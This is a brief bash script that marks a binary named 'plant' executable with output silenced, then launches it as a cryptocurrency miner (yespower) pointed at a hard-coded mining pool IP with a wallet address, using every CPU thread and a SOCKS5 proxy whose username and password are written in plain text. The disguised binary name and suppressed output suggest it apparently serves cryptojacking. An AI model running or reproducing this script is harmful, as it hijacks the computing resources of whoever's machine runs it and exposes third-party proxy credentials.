#!/bin/bash

chmod +x plant  >/dev/null 2>&1
./plant -a yespower -o stratum+tcp://103.249.70.7:6533 -u TRzWbrKRmJYETRPTrVW8RwbX6Sa9KJNbZ7.SSS -p c=TRX,mc=BTE -t $(nproc) -x socks5://ubuntu2004-rotate:LijayaAnli1188@p.webshare.io:80
